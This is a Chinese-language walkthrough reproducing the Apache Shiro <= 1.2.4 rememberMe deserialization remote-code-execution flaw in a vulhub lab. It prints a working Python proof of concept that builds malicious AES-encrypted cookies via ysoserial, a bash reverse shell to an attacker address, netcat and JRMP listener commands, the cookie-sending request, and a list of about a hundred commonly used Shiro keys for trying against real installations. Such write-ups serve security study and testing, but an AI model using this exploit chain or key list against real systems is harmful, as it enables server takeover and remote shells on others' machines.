0x00 影響版本
Apache Shiro <= 1.2.4
0x01 產生原因
shiro默認使用了CookieRememberMeManager,其處理cookie的流程是:
得到rememberMe的cookie值-->Base64解碼-->AES解密-->反序列化
然而AES的密鑰是硬編碼的,就導致了攻擊者可以構造惡意數據造成反序列化的RCE漏洞。
payload 構造
前16字節的密鑰-->后面加入序列化參數-->AES加密-->base64編碼-->發送cookie
0x02 靶場環境
docker pull vulhub/shiro
然后打開127.0.0.1:8080
0x03 漏洞復現
POC:
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())
攻擊機上執行腳本生成惡意cookie
python shiro_shell.py 1.1.1.1:1099 #1.1.1.1為你的攻擊機ip 端口可以隨意變動,但是后面監聽的時候也要做相應變動
生成的cookie類似下圖
反彈shell制作
反彈shell需要加密,網址:http://www.jackson-t.ca/runtime-exec-payloads.html
反彈shell代碼如下
bash -i >& /dev/tcp/1.1.1.1/7878 0>&1 #1.1.1.1為攻擊機ip
攻擊機監聽端口
攻擊機1.1.1.1上打開兩個窗口,
其中一個窗口監聽shell
nc -lvp 7878
另一個窗口監聽JRMP端口
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 '加密后的反彈shell'
將生成的惡意cookie通過httpie發送
在攻擊機1.1.1.1上執行如下代碼
http 1.1.1.2:8080/login 'Cookie:rememberMe=UfsKYXK1SIOgFdnOxdPidh09yGZv6Medaj/T0E5sE9xhxMP69kzlNKsEdfHUhTgD12ea7NOv+xRhnZSGhUi9rz1tYVPu5QHfINrMS4I+lTe82RO5PY1vJrmMwP/NnBvjfGtTWTwRSNl1AhNgJrAhrEBStf+cpnBMwmoWxiexDjm2BavY/lSLe52hZhCEcr0zv/kqC9PdhBfY326+ux/RkE0pfwfZNMEUrPIZw8gBJkCIDTb1qj+W32+YinOKCkye/i+GmKHifPoMSt91q0nR/NQnxyu4UJQoULSbCI3/vXKtGm7P+YNqhH6smVPIoTxqtAqWTJG7eOafDPC2azUlhbLcmjql7qDL2wPpv4JOxB0fLIwdkQqSn9DCBty2BfKDqf8I/lvTbKqHHfVIUMdjYQ=='
查看攻擊機上監聽的結果
發現兩個端口都會收到消息
shell反彈到7878端口
常用的100個key
4AvVhmFLUs0KTA3Kprsdag==
3AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAA==
2AvVhdsgUs0FSA3SDFAdag==
wGiHplamyXlVB11UXWol8g==
kPH+bIxk5D2deZiIxcaaaA==
fCq+/xW488hMTCD+cmJ3aQ==
1QWLxg+NYmxraMoxAXu/Iw==
ZUdsaGJuSmxibVI2ZHc9PQ==
L7RioUULEFhRyxM7a2R/Yg==
6ZmI6I2j5Y+R5aSn5ZOlAA==
r0e3c16IdVkouZgk1TKVMg==
ZWvohmPdUsAWT3=KpPqda
5aaC5qKm5oqA5pyvAAAAAA==
bWluZS1hc3NldC1rZXk6QQ==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
LEGEND-CAMPUS-CIPHERKEY==
bWljcm9zAAAAAAAAAAAAAA==
1AvVhdsgUs0FSA3SDFAdag==
5RC7uBZLkByfFfJm22q/Zw==
3AvVhdAgUs0FSA4SDFAdBg==
a3dvbmcAAAAAAAAAAAAAAA==
eXNmAAAAAAAAAAAAAAAAAA==
U0hGX2d1bnMAAAAAAAAAAA==
Ymx1ZXdoYWxlAAAAAAAAAA==
UGlzMjAxNiVLeUVlXiEjLw==
7AvVhmFLUs0KTA3Kprsdag==
MTIzNDU2Nzg5MGFiY2RlZg==
OY//C4rhfwNxCQAQCrQQ1Q==
FP7qKJzdJOGkzoQzo2wTmA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
MDgBSEFqYIoWYezkWDywig==
0Av6jWaXCkCu5A9nJbPxLI==
fPimdozRt+SSSbZS8/HARA==
U3ByaW5nQmxhZGUAAAAAAA==
0AvVhmFLUs0KTA3Kprsdag==
25BsmdYwjnfcWmnhAciDDg==
3JvYhmBLUs0ETA5Kprsdag==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
cmVtZW1iZXJNZQAAAAAAAA==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
aU1pcmFjbGVpTWlyYWNsZQ==
bXRvbnMAAAAAAAAAAAAAAA==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg==
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==